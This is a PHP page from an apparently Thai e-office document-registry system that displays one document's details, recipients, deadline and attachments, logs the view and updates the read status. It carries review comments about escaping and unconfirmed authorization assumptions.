Current File : /var/www/html/eoffice/application/document/docreg_getview.php
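<?php
// Detail view for one registered document: loads the `document` row, its
// recipients, the viewer's receive record and the attachment list, then
// renders the table further down.
session_start();

// NOTE(review): $id is not assigned anywhere in this file — presumably it comes
// from the request (register_globals) or from the including script; confirm.
// It ends up inside a quoted SQL literal, so it is escaped for that context.
// NOTE(review): no check is visible here that a logged-in user exists or is
// allowed to view this document — presumably the including script does that;
// confirm.
$id_sql = mysql_real_escape_string($id);
$sql="
SELECT
*
FROM
document
WHERE
document.id =  '$id_sql'
";
$result = mysql_query($sql);
if (!$result) {
	// Driver error text goes to the server log, not into the response.
	error_log("docreg_getview.php: document query failed: " . mysql_error());
	die("Query line " . __LINE__ . " error");
}
$ers = mysql_fetch_assoc($result);
if (!$ers) {
	// Unknown id. The original script also stopped in this case, but only later
	// and through an SQL syntax error in the attachment-permit query; stop here
	// explicitly instead.
	die("Query line " . __LINE__ . " error");
}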



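// Build a "prename staffname staffsurname" label from a doc_receive row joined
// to the staff table, stored in $pr under that row's docid.
// NOTE(review): this query has no WHERE clause, so the one row fetched is
// whichever receive record the server returns first — not necessarily one for
// the current document. The group query below filters on docid; confirm
// whether the same filter is missing here.
// NOTE(review): $table_staff is interpolated as an identifier and is not
// assigned in this file — presumably fixed configuration, never request data;
// confirm.
$sql_p="
SELECT
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname,
doc_receive.staff_id,
doc_receive.docid
FROM
doc_receive
Inner Join $table_staff ON doc_receive.staff_id = $table_staff.staffid
";
$result_p = mysql_query($sql_p);
if (!$result_p) {
	// Driver error text goes to the server log, not into the response.
	error_log("docreg_getview.php: staff recipient query failed: " . mysql_error());
	die("Query line " . __LINE__ . " error");
}
$ersp = mysql_fetch_assoc($result_p);
// Array keys are quoted: a bare word is resolved as a constant first and only
// falls back to a string with a notice.
$pr[$ersp['docid']] = $ersp['prename'] . " " . $ersp['staffname'] . " " . $ersp['staffsurname'];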



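// Look up the name of a group this document was sent to; the first matching
// row is stored in $gr under its docid.
// NOTE(review): $table_staffgroup is interpolated as an identifier and is not
// assigned in this file — presumably fixed configuration; confirm.
// The document id comes from the row loaded above; it is still escaped because
// it is placed inside a quoted SQL literal.
$docid_sql = mysql_real_escape_string($ers['id']);
$sql_g="
SELECT
doc_receive.docid,
$table_staffgroup.groupname,
doc_receive.group_id
FROM
doc_receive
Inner Join $table_staffgroup ON doc_receive.group_id = $table_staffgroup.gid
WHERE
doc_receive.docid =  '$docid_sql'
";
$result_g = mysql_query($sql_g);
if (!$result_g) {
	// Driver error text goes to the server log, not into the response.
	error_log("docreg_getview.php: group recipient query failed: " . mysql_error());
	die("Query line " . __LINE__ . " error");
}
$ersg = mysql_fetch_assoc($result_g);
// Quoted keys avoid the constant lookup a bare word triggers.
$gr[$ersg['docid']] = $ersg['groupname'];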


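// Load the receive records addressed to the current staff member and index
// status, comment and deadline data by document id.
// NOTE(review): $session_staffid is not assigned in this file — presumably the
// including script copies it from the session; confirm that a request
// parameter cannot override it.
if ($session_staffid === null || $session_staffid === '') {
	// The original interpolated the id unquoted, so an empty id produced an SQL
	// error and stopped the page. Keep that fail-closed outcome explicitly.
	die("Query line " . __LINE__ . " error");
}
// Quoted and escaped, matching the quoted form other queries in this file use.
// NOTE(review): on a non-numeric staff_id column, quoting turns a numeric
// comparison into a string comparison — confirm the column type.
$staffid_sql = mysql_real_escape_string($session_staffid);
$sql_permit="
SELECT
doc_receive.docid,
doc_receive.status,
doc_receive.comment,
doc_receive.deadline,
doc_receive.deadline_alert
FROM
doc_receive
where
doc_receive.staff_id='$staffid_sql'
group by doc_receive.docid
";

$result_permit = mysql_query($sql_permit);
if (!$result_permit) {
	// Driver error text goes to the server log, not into the response.
	error_log("docreg_getview.php: receive-record query failed: " . mysql_error());
	die("Query line " . __LINE__ . " error");
}
while ($rs_permit = mysql_fetch_assoc($result_permit)) {
	$permit_docid = $rs_permit['docid'];
	// NOTE(review): $pr also holds the recipient name label set earlier in this
	// file; here it is reused to hold a docid keyed by staff id.
	$pr[$session_staffid] = $permit_docid;
	$read_status[$permit_docid] = $rs_permit['status'];
	$p_comment[$permit_docid] = $rs_permit['comment'];

	if ($rs_permit['deadline']) {
		$owner_deadline[$permit_docid] = $rs_permit['deadline'];
		$owner_alert[$permit_docid] = $rs_permit['deadline_alert'];
		// Days from today to the deadline, both taken at 12:00. The deadline is
		// split on "-" and read as year, month, day.
		$d = explode("-", $rs_permit['deadline']);
		$mkremain = (mktime(12, 0, 0, $d[1], $d[2], $d[0]) - mktime(12, 0, 0, date("m"), date("d"), date("Y"))) / (24 * 60 * 60);
		$owner_remain[$permit_docid] = $mkremain;
	}
}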


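// Collect every attachment of the current document: display name, stored file
// reference and description, each indexed by attachment id.
// The document id is escaped because it is placed inside a quoted SQL literal.
$docid_sql = mysql_real_escape_string($ers['id']);
$sql_attach_check = "
SELECT
doc_attach.id,
doc_attach.name,
doc_attach.attach,
doc_attach.description
FROM
doc_attach
Inner Join document ON doc_attach.docid = document.id
WHERE
document.id = '$docid_sql'
";
$result_check = mysql_query($sql_attach_check);
if (!$result_check) {
	// Driver error text goes to the server log, not into the response.
	error_log("docreg_getview.php: attachment query failed: " . mysql_error());
	die("Query line " . __LINE__ . " error");
}
while ($crs = mysql_fetch_assoc($result_check)) {
	// Quoted keys avoid the constant lookup a bare word triggers.
	$attach_row_id = $crs['id'];
	$attachname[$attach_row_id] = $crs['name'];
	$attachfile[$attach_row_id] = $crs['attach'];
	$descritment[$attach_row_id] = $crs['description'];
}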

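// For each attachment of this document that is shared with the current staff
// member through doc_receive, record that staff id in $permit[attachment id].
// The template uses $permit to decide whether to print a download link.
if (!$ers || $session_staffid === null || $session_staffid === '') {
	// The original interpolated both values unquoted, so a missing document or
	// an empty staff id produced an SQL error and stopped the page. Keep that
	// fail-closed outcome explicitly.
	die("Query line " . __LINE__ . " error");
}
// Both values are now quoted and escaped, as in the other queries of this file.
$docid_sql = mysql_real_escape_string($ers['id']);
$staffid_sql = mysql_real_escape_string($session_staffid);
$sql_attach_permit = "
SELECT
doc_attach.id,
doc_attach.name,
doc_attach.attach,
doc_receive.staff_id,
doc_receive.group_id,
doc_receive.`deadline`,
doc_receive.`deadline_alert`
FROM
doc_attach
Inner Join document ON doc_attach.docid = document.id
Inner Join doc_receive ON doc_receive.docid = document.id
where
doc_attach.docid='$docid_sql'
and doc_receive.staff_id='$staffid_sql'
";
$result_permit = mysql_query($sql_attach_permit);
if (!$result_permit) {
	// Driver error text goes to the server log, not into the response.
	error_log("docreg_getview.php: attachment-permit query failed: " . mysql_error());
	die("Query line " . __LINE__ . " error");
}
while ($permit_rs = mysql_fetch_assoc($result_permit)) {
	$permit[$permit_rs['id']] = $permit_rs['staff_id'];
}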
/*
if ($_SERVER[REQUEST_METHOD] == "POST"){ 


}
*/
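// Choose the addressee label: the group name when the document row has a
// group_id, replaced by the staff name label when it has a staff_id.
// Keys are quoted so they are not resolved as constants.
if ($ers['group_id']) { $getting = $gr[$ersg['docid']]; }
if ($ers['staff_id']) { $getting = $pr[$ersp['docid']]; }
?>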
<style type="text/css">
<!--
.style2 {color: #FF0000;}
-->
</style>

<TABLE width="98%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#eeeeee">
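<TR><TD  align="center" valign="top"><table width="100%" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC" <?php /* grey background when the document row has a truthy doc_status; key quoted so it is not resolved as a constant */ if ($ers['doc_status']) { echo "bgcolor=#CCCCCC"; } ?>>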
	<tr>
		<td><table width="360" border="0" cellspacing="0" cellpadding="0" class="normal">
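			<tr bgcolor="#f8f8f8">
				<td height="20" colspan="2" class="normal_blue">&nbsp;<img src="../../images/document_view.gif" width="24" height="24" border="0" align="absmiddle" /><b class="brown">
					<?php
					// The stored title is escaped before it reaches the markup.
					// NOTE(review): assumes titles are stored as plain text in the page's
					// charset — confirm before relying on this for rich content.
					echo htmlspecialchars($ers['title'], ENT_QUOTES);
					?>
					<br />
					ทะเบียนหนังสือ<?php
					// Register label suffix. $type is only compared against fixed values
					// here, never echoed.
					if ($type == "get") { echo "รับ"; } elseif ($type == "send") { echo "ส่ง"; } elseif ($type == "circular") { echo "เวียน"; }
					?>
					
				</b></td>
				</tr>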
			<tr>
				<td colspan="2"><hr color="#eeeeee" /></td>
			</tr>
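			<tr>
				<td width="157" align="right" valign="top" class="normal_black">ลำดับเอกสาร&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top">&nbsp;
						<?php /* stored value, escaped for the HTML text context */ echo htmlspecialchars($ers['docid'], ENT_QUOTES); ?></td>
			</tr>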
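			<?php if ($type == "get") { /* receive-date row, incoming register only */ ?>
			<tr>
				<td align="right" valign="top" class="normal_black">วันรับเอกสาร&nbsp;<b>:</b>&nbsp;</td>
				<td valign="top">&nbsp;
					<?php
					// daythai() is defined outside this file — presumably it formats the
					// stored date for display. Key quoted so it is not read as a constant.
					if ($ers['tdate']) { echo daythai($ers['tdate']); }
					?>
					</td>
			</tr>
			<?php } ?>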
			
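			<tr>
				<td width="157" align="right" valign="top" class="normal_black">เลขหนังสือ&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top">&nbsp;
						<?php /* stored value, escaped for the HTML text context */ echo htmlspecialchars($ers['refid'], ENT_QUOTES); ?>
						<?php
						// Read the settings table. Only $auto_check and $max_out are derived,
						// and neither changes what this row prints: the number suffix that
						// depended on $auto_check was already disabled in the original.
						// NOTE(review): the two $max_out tests read $command['runningout']
						// while the first test reads $command['command'] — possibly a typo;
						// confirm against the columns of the `system` table.
						$sql_setting="
						select * from system 
						";
						$result = mysql_query($sql_setting);
						// A failed query returns false; skip the loop rather than fetch from it.
						if ($result) {
							while ($command = mysql_fetch_assoc($result)) {
								if ($command['command'] == "autonumber") { $auto_check = $command['value']; }
								if ($command['runningout'] == "runningout") { $max_out = $command['value']; }
								if ($command['runningout'] == "runningcircular") { $max_out = $command['value']; }
							}
						}
						?>
						ลงวันที่. 
						<?php echo daythai($ers['pdate']); ?></td>
			</tr>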
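			<tr>
				<td align="right" valign="top" class="normal_black">จาก&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top">&nbsp;
						<?php /* sender as stored on the document row, escaped for HTML */ echo htmlspecialchars($ers['sending'], ENT_QUOTES); ?></td>
			</tr>
			<tr>
				<td align="right" valign="top" class="normal_black">ถึง&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top">&nbsp;
						<?php /* addressee as stored on the document row, escaped for HTML */ echo htmlspecialchars($ers['getting'], ENT_QUOTES); ?></td>
			</tr>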
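			<?php
			/* Disabled row that printed $ers['sector'].
			   It used to be wrapped in an HTML comment, but PHP inside an HTML comment
			   still runs, so the stored value was sent to the browser unescaped.
			   Nothing is emitted for this row any more. */
			?>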
			<?php if ($owner_deadline[$id]) { /* shown only when the viewer's receive record for this id has a deadline */ ?>
			<tr valign="top">
				<td align="right" valign="top" class="normal_black"><span class="normal_blue">วันดำเนินการ&nbsp;<b>:</b>&nbsp; </span></td>
				<td valign="top">&nbsp;
					<?php
					echo daythai($owner_deadline[$id]);
					// Days remaining, as computed when the receive records were loaded.
					$days_left = $owner_remain[$id];
					if (($days_left <= $owner_alert[$id]) && ($days_left > "0")) { ?> 
					<span class="style2"><b>เหลือเวลา 	<?php echo $days_left; ?> วัน 
					 </b></span>
					 <?php } elseif ($days_left == "0") { ?><span class="style2"><b> วันสุดท้าย </b></span><?php } ?>				</td>
			</tr>
			<?php } ?>
			
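			<tr valign="top">
				<td align="right" valign="top" class="normal_black">ชั้นความเร็ว<span class="normal_blue">&nbsp;<b>:</b>&nbsp;</span></td>
				<td align="left" valign="top">&nbsp; 
<?php
// Label for the stored speed code; any other code prints nothing.
// Key quoted so it is not resolved as a constant.
if ($ers['speed'] == "100") { ?>ด่วน<?php }
if ($ers['speed'] == "200") { ?>ด่วนมาก<?php }
if ($ers['speed'] == "300") { ?>ด่วนที่สุด<?php } ?>				</td>
			</tr>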
			
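			<?php
			// $sercet_select (sic) is not assigned in this file; the row is shown when it
			// is unset/empty or equals "on".
			if (!$sercet_select || $sercet_select == "on") { ?>
			<tr valign="top">
				<td align="right" valign="top" class="normal_black">ชั้นความลับ<span class="normal_blue">&nbsp;<b>:</b>&nbsp;</span></td>
				<td align="left" valign="top">&nbsp; 		
<?php
// Label for the stored secrecy code; any other code prints nothing.
// Key quoted so it is not resolved as a constant.
if ($ers['secret'] == "100") { ?>ลับ<?php }
if ($ers['secret'] == "200") { ?>ลับมาก<?php }
if ($ers['secret'] == "300") { ?>ลับที่สุด<?php } ?>				</td>
			</tr>
			<?php } ?>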
			
			
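			<?php
			// NOTE(review): for type "get" a receive-date row is also printed near the
			// top of this table, so the date appears twice — confirm that is intended.
			if ($type == "get") { ?>
			<tr valign="top">
				<td align="right" class="normal_black">วันรับเอกสาร&nbsp;<b>:</b>&nbsp;</td>
				<td valign="top">&nbsp;
				<?php
				// No explicit receive date: fall back to the part of time_rec before
				// the first space.
				if (!$ers['tdate']) { $ti1 = explode(" ", "$ers[time_rec]"); $ers['tdate'] = $ti1[0]; }
				?>
					<?php echo daythai($ers['tdate']); ?></td>
			</tr>
			<tr valign="top">
				<td align="right" class="normal_black">การปฏิบัติ&nbsp;<b>:</b>&nbsp;</td>
				<td valign="top">&nbsp;
					<?php /* stored value, escaped for the HTML text context */ echo htmlspecialchars($ers['mission'], ENT_QUOTES); ?></td>
			</tr>
			<?php } ?>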
			
			
			
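			<tr valign="top">
				<td width="157" align="right" valign="top" class="normal_black">หมายเหตุ&nbsp;<b>:</b>&nbsp;</td>
				<td valign="top">&nbsp;
						<?php
						// Document-level remark, escaped for HTML.
						// NOTE(review): if remarks are stored with intentional markup (for
						// example line breaks), escaping will show it literally — confirm how
						// they are saved.
						echo htmlspecialchars($ers['comment'], ENT_QUOTES);
						?>
						<br />
						<br />
					&nbsp;
					<?php /* remark from the viewer's own receive record for this document */ echo htmlspecialchars($p_comment[$ers['id']], ENT_QUOTES); ?></td>
			</tr>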
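			<tr valign="top">
				<td align="right" valign="top" class="normal_black">&nbsp;ไฟล์เอกสารแนบ&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top"><ul>
						<?php
// One list item per attachment. The download link is printed only for viewers
// with permit 200, the document owner, or a staff member the attachment is
// shared with; everyone else sees the description as plain text.
// NOTE(review): hiding the link is presentation only. download_file.php is not
// visible here and must repeat this authorization check itself — confirm.
// NOTE(review): the comparisons are loose (==), so an unset $permit entry equals
// an empty $session_staffid — confirm the staff id is always set at this point.
if (is_array($attachname)) {
	foreach ($attachname as $attach_id => $attach_name) {
		// trimtxt() is defined outside this file — presumably it shortens the text
		// to 32 characters. Its result is escaped before output.
		$attach_label = htmlspecialchars(trimtxt($descritment[$attach_id], 32), ENT_QUOTES);
		$may_download = ($session_permit[200]) || ($session_staffid == $ers['owner']) || ($permit[$attach_id] == $session_staffid);
		?>
						<li><img src="../../images/attach16.gif" width="16" height="16" border="0" align="absmiddle"/>
								<?php if ($may_download) { ?>
								<a href="download_file.php?reading=<?php echo urlencode($attach_id); ?>" target="_blank" title="<?php echo htmlspecialchars($attach_name, ENT_QUOTES); ?>">
								<?php echo $attach_label; ?>
								</a>
								<?php } else { ?>
								<?php echo $attach_label; ?>
								<?php } ?>
						</li>
		<?php
		// The closing </li> now sits inside the loop. The original printed it once
		// after the loop, leaving items unclosed and a stray tag when the list was
		// empty.
	}
}
	?>
				</ul>					 				</td>
			</tr>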
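			<?php if (($session_permit[300])) { /* row shown only to viewers holding permit 300 */ ?>
			<tr>
			<td align="center" valign="top">				</td>
				<td align="left" valign="top">
				<?php
				/* A disabled statistics table and a disabled "forward document" link used
				   to sit here inside HTML comments. PHP inside an HTML comment still runs,
				   so their echoes of $all, $aaa, $ppp, $PHP_SELF, $ers[id], $page and $type
				   were sent to the browser unescaped. They are no longer emitted. */
				?>
					<br />
					 <div align="right">
					<?php
					// $type is not assigned in this file (presumably request-supplied —
					// confirm). Both values are URL-encoded so they stay inside the query
					// string of the quoted popup URL.
					?>
					<label onclick="MM_openBrWindow('take_doc.php?type=<?php echo urlencode($type); ?>&id=<?php echo urlencode($ers['id']); ?>','add_user','addres=no,toolbar=no,scrollbars=yes,width=400,height=600')">
					<u style="cursor:hand">ลงทะเบียนรับหนังสือต้นฉบับ </u></label>&nbsp;					</div>					</td>
			</tr>
			<?php } ?>			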
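			<tr>
				<td colspan="2" align="center"><hr color="#eeeeee" />
							
						<?php
						// "Back to list" target. $page and $type are not assigned in this file
						// (presumably request-supplied — confirm), so they are URL-encoded.
						// $PHP_SELF can carry request path text, so it is escaped for the
						// JavaScript string first, and the whole URL is then HTML-escaped for
						// the attribute. For ordinary values the output is unchanged.
						$back_url = addslashes($PHP_SELF) . "?page=" . urlencode($page) . "&type=" . urlencode($type);
						?>
						<input name="button" type="button" class="input" style="width:100;" onclick="window.location.replace('<?php echo htmlspecialchars($back_url, ENT_QUOTES); ?>')" value="กลับหน้าหลัก" />						</td>
			</tr>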
		</table></td>
	</tr>
</table></TD>
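<TD width="80%" align="center" valign="top">
	<?php
	// Variables set just before the history panel is included — presumably
	// docreg_history.php reads them, since an include shares this scope; confirm.
	// Keys are quoted so they are not resolved as constants.
	$user_id = $ers['id'];
	$timecoming = $ers['time_rec'];
	$ownercoming = $ers['owner'];
	// Fixed include path: no request data takes part in choosing the file.
	include "docreg_history.php";
	?></TD>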
</TR>
</TABLE>


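<?php

// --- Start: set the name, position and action used for the history log ---
// (Disabled alternatives that echoed the session title or derived an action
// label from $action were removed.)
if ($session_fullname_title == "") {
	// Session keys are quoted so they are not resolved as constants.
	$session_fullname_title = $_SESSION['session_title'] . $_SESSION['session_fullname'];
}
$action_id = "view";
// NOTE(review): this query names epm_staff directly, while the recipient lookup
// earlier in the file uses $table_staff — confirm they refer to the same table.
$staffid_sql = mysql_real_escape_string($session_staffid);
$sql4 = " SELECT title FROM epm_staff WHERE staffid = '$staffid_sql'   ";
$result4 = mysql_query($sql4);
// A failed query returns false; skip the loop rather than fetch from it.
if ($result4) {
	while ($rs4 = mysql_fetch_assoc($result4)) {
		$position_now = $rs4['title'];
	}
}
// Per the original author's note, $session_fullname_title already contains the
// position, so $position_now is not appended to it.
// --- End: set the name, position and action ---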



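// Write a history entry the first time this staff member opens the document:
// look for an existing doc_history row with the same document, owner and action.
$docid_sql = mysql_real_escape_string($ers['id']);
$staffid_sql = mysql_real_escape_string($session_staffid);
$action_sql = mysql_real_escape_string($action_id);
$sql4 = "SELECT * FROM doc_history WHERE docid='$docid_sql' AND doc_owner='$staffid_sql' AND doc_action='$action_sql' ";
// NOTE(review): mysql_db_query() also selects $dbname (not assigned in this
// file); it is kept because replacing it could change which database is used.
$result4 = mysql_db_query($dbname, $sql4);
if (!$result4) {
	// The original echoed mysql_error() into the page; log it instead.
	error_log("docreg_getview.php: history lookup failed: " . mysql_error());
}

// As in the original, a failed lookup is treated like "no entry yet".
if (!$result4 || mysql_num_rows($result4) == 0) { // not opened before
	$doc_history = "เปิดเอกสาร $ers[id]";
	// NOTE(review): $doc_id is not assigned in this file, so $pr[$doc_id] is
	// presumably empty here — confirm which value doclog() expects.
	doclog($ers['id'], $pr[$doc_id], '', $session_fullname_title, $session_staffid, $session_fullname_title, '', $doc_history, $action_id);
}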




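// Move the viewer's receive record for this document from status '0' to '100'
// and stamp timeknow with the current time. Rows in any other status are left
// untouched by the WHERE clause.
// Both values sit inside quoted SQL literals and are escaped for that context.
$docid_sql = mysql_real_escape_string($ers['id']);
$staffid_sql = mysql_real_escape_string($session_staffid);
$sql_update_status = "
UPDATE   doc_receive  SET  
doc_receive.status='100',
doc_receive.timeknow=now( ) 
WHERE (doc_receive.docid='$docid_sql')
AND doc_receive.staff_id='$staffid_sql'
AND doc_receive.status='0'
";
$result_update_status = mysql_query($sql_update_status);
if (!$result_update_status) {
	// Driver error text goes to the server log, not into the response.
	error_log("docreg_getview.php: status update failed: " . mysql_error());
	die("Query line " . __LINE__ . " error");
}

?>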
